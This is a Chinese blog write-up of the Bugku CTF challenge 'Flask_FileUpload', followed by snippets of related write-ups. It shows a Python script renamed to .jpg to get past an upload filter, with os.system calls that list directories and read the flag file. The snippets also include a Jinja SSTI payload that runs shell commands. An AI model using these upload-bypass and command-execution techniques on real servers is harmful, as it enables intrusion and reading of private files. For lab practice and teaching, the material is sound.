[CTF]Bugku Flask_FileUpload

最新推荐文章于 2025-09-02 10:48:51 发布

原创最新推荐文章于 2025-09-02 10:48:51 发布 · 1.1k 阅读

0 ·

CC 4.0 BY-SA版权

CTF 专栏收录该内容

7 篇文章

订阅专栏

博客内容讲述了如何在CTF挑战中通过上传Python脚本并修改扩展名为jpg来绕过限制。作者利用os模块执行命令，列出目录并读取flag文件内容，从而获取到隐藏的flag。

部署运行你感兴趣的模型镜像

https://ctf.bugku.com/challenges/detail/id/204.html

上传文件，显示只能提交jpg或者png的图片格式。

但是页面的response中有提示，需要提交python。

直接上传python脚本，修改包的文件扩展名为jpg，python内容是获取当前目录或者上一层目录的文件。这里只截图../的信息，看到里面有个flag文件，再加一段cat这个flag文件便可取得flag。

import os
os.system('ls ../')
os.system('cat ../flag')

您可能感兴趣的与本文相关的镜像

Python3.9

Conda

Python

Python 是一种高级、解释型、通用的编程语言，以其简洁易读的语法而闻名，适用于广泛的应用，包括Web开发、数据分析、人工智能和自动化脚本

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

m3gaf0rce

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BugKu-Flask_FileUpload

nextlubricate的博客

04-24

2348

根据题目提示文件上传 f12查看，发现做了过滤只能上传.jpg .png，

Bugku之Flask_FileUpload

金帛的博客

05-06

1729

Bugku的WP

参与评论您还未登录，请先登录后发表或查看评论

bugku Flask_FileUpload

hintll的博客

06-19

899

bugku Flask_FileUpload 打开环境后：习惯性先传一个.php 看一下回显：结果发现它只识别了图片格式的文件看一下源码，它有没有过滤发现前端有一个比较特殊的注释它的意思大概是：让上传一个文件它会去用python执行并返回一个结果好新颖的一个题一般情况文件上传都是在用php来执行这个题是在用py来执行那就试着写一个py的代码让系统输出ls，再输出flag 构造命令：然就上传：这个回显的意思查了一下大概是：不同APP下templates目录中同名.html文件

BugKu-CTF(web篇)---Flask_FileUpload

Nailaoyyds的博客

03-07

3464

WEB题型 文件上传和远程代码执行列出上传文件夹下的文件两个文件夹和一个py文件看一下app.py的内容发现有一个/flag的文件上传得到flag

bugku CTF练习：Flask_FileUpload思路

xijieyuan2qi的博客

12-22

2297

https://ctf.bugku.com/challenges/detail/id/204.html 打开页面是这个样子。右键查看源代码。它提示我说会用Python去执行。太棒了。选择一张普通图片。点击上传。把流量转到burpsuite上。把burpsuite上抓到的包发送到重发模块把图片的内容删除。改成 import os print(os.system('ls -al')) 发现执行了Python，想了一下。应该是Python执行系统命令。一步...

Bugku CTF_Web——xxx二手交易市场

weixin_71914594的博客

11-10

499

包好像是base64加密的。把包发到repeter里。连接成功就好找flag了。再base64编码一下。记得去除一下多的斜杠。

BugKu CTF之 Simple_SSTI_2

weixin_42557264的博客

09-16

2071

进入场景和Simple_SSTI_1一样提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹，进入查看，先看看第一个，运气很好，第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.

[pasecactf_2019]flask_ssti

cjdgg的博客

07-05

3168

[pasecactf_2019]flask_ssti 进入题目后如下图所示因为题目本身就提示ssti了，我也就直接尝试有没有过滤了这里过滤了下划线，使用十六进制编码绕过，_编码后为\x5f， .过滤的话我们直接用[]包含绕过这里过滤了单引号，我们用双引号绕过这题过滤已经找完了，接下来是构造相当于执行{{class}} 相当于执行{{class.bases[0]}} 相当于执行{{class.bases[0].subclasses()}} 下面贴一个脚本用来找可用类 import js

Bugku CTF Flask_FileUpload 解题思路

m0_73734159的博客

10-12

1073

Bugku CTF Flask_FileUpload 解题思路

Bugku CTF_Web——Flask_FileUpload

weixin_71914594的博客

11-05

356

意思是上传文件然后用python运行返回结果。设置白名单只能上传jpg或者png文件。保存后将文件改为png或者jpg上传。下一步直接修改代码查看flag。F12查看找信息看到一行注释。那直接上传python代码。

flask-file-upload：轻松上传Flask文件

02-05

与Flask＆SqlAlchemy一起使用的库可将文件存储在服务器上和数据库中阅读文档：安装请安装最新的稳定版本： pip install flask-file-upload 常规Flask配置选项（重要：在启动FileUpload之前，需要设置以下配置变量） # This is the directory that flask-file-upload saves files to. Make sure the UPLOAD_FOLDER is the same as Flasks's static_folder or a child. For example: ap

CTF-Bugku-WEB-Flask_FileUpload

P5093的博客

06-07

1555

个人学习记录笔记。

ctf Flask_FileUpload

weixin_43256484的博客

08-20

451

做题

Bugku Flask_FileUpload

qq_52718293的博客

10-24

1117

这道题还是比较好理解的，先f12查看源码，然后源码的大概意思是只能上传png和jpg文件，并且会用python来执行文件。然后用记事本写就欧克，引入import os ，调用cat flag。然后上传文件，在f12就可以看到flag ...

使用put方法上传文件_一篇文章整合基于Flask应用Graphql上传文件的方法

weixin_39609953的博客

11-29

336

Graphql 定义GraphQL 是 API 的查询语言，是用于现有的数据来完成查询。GraphQL 为 API 中的数据提供了完整且易于理解的描述，使客户能够准确地请求他们所需的内容。文章背景一个开发项目要求基于 Flask 应用 GraphQL API 进行开发，但是在开发过程中发现，部分请求涉及到上传文件等操作，但是众所周知 GraphQL 对 文件上传的支持非常的不好，且没有比较好用的官...

二十、bugku Flask_FileUpload

山兔的博客

09-06

281

远程代码执行 import os os.system('echo $FLAG$') system函数可以将字符串转化成命令在服务器上运行查看上传页面源代码，有一行注释，写明了上传py文件会运行。编辑python 代码，内容为引入 import os os.system('echo $FLAG$') ，修改文件名为：1.jpg。上传后查看网页源代码即可获得falg。 import os os.system('cat app.py') ...

BugKu Flask_FileUpload WP

Esther_Husband的博客

09-02

206

文章摘要：题目考察Flask框架的文件上传漏洞。通过上传含Python代码的图片（利用os.system执行命令），成功获取flag。解题关键：Flask框架解析漏洞、Python脚本编写能力及BurpSuite抓包修改技巧。

Bugku WEB Flask_FileUpload

lin的博客

04-12

1324

1.打开是个提交界面看源码 2.只允许jpg,png文件而且提示说上传的文件会用python执行 3.上传，查看response

Bugku CTF_秋名山车sor1

最新发布

12-30

Bugku CTF中关于类似“秋名山车”的题目，通常需要在限时内计算车速并通过POST方式传递结果。由于手动计算并传值会超过2s的时间限制，所以需要编写Python脚本实现。以下是解题的详细步骤及示例脚本： 1. **导入必要的库**：需要`requests`库用于发送HTTP请求，`re`库用于正则表达式匹配。 2. **获取题目页面**：使用`requests.session()`保持会话，确保在整个过程中表达式一致。通过`get`方法获取题目页面的内容。 3. **提取表达式**：使用正则表达式从页面内容中提取需要计算的表达式。 4. **计算表达式的值**：使用`eval()`函数计算表达式的值。 5. **构造POST数据**：将计算结果存储在字典中，作为POST请求的数据。 6. **发送POST请求**：使用`post`方法将计算结果发送到题目页面，并打印响应内容。以下是示例脚本： ```python import requests import re # 题目URL url = 'http://114.67.246.176:15506/' # 创建会话对象 s = requests.session() # 获取页面内容 response = s.get(url) # 使用正则表达式提取表达式 equation = re.search(r'(\d+[+\-*])+(\d+)', response.text).group() # 计算表达式的值 result = eval(equation) # 构造POST数据 data = {'value': result} # 发送POST请求并打印响应内容 print(s.post(url, data=data).text) ``` 正则表达式`(\d+[+\-*])+(\d+)`的含义： - `\d+`：表示匹配一个或多个数字。 - `[+\-*]`：表示匹配一个加号、减号或乘号。 - `(\d+[+\-*])+`：表示匹配多个数字和运算符组成的“表达式”。 - `(\d+)`：表示最后再加上一组数字。 `re.search()`方法用于扫描整个字符串，并返回第一个成功的匹配。`group()`方法用于返回匹配的字符串。`eval()`函数用于执行一个字符串表达式，并返回表达式的值。需要注意的是，不同的题目URL可能不同，在实际解题时需要根据题目提供的URL进行修改。此外，有时脚本执行后可能不会立即弹出flag，需要多试几次。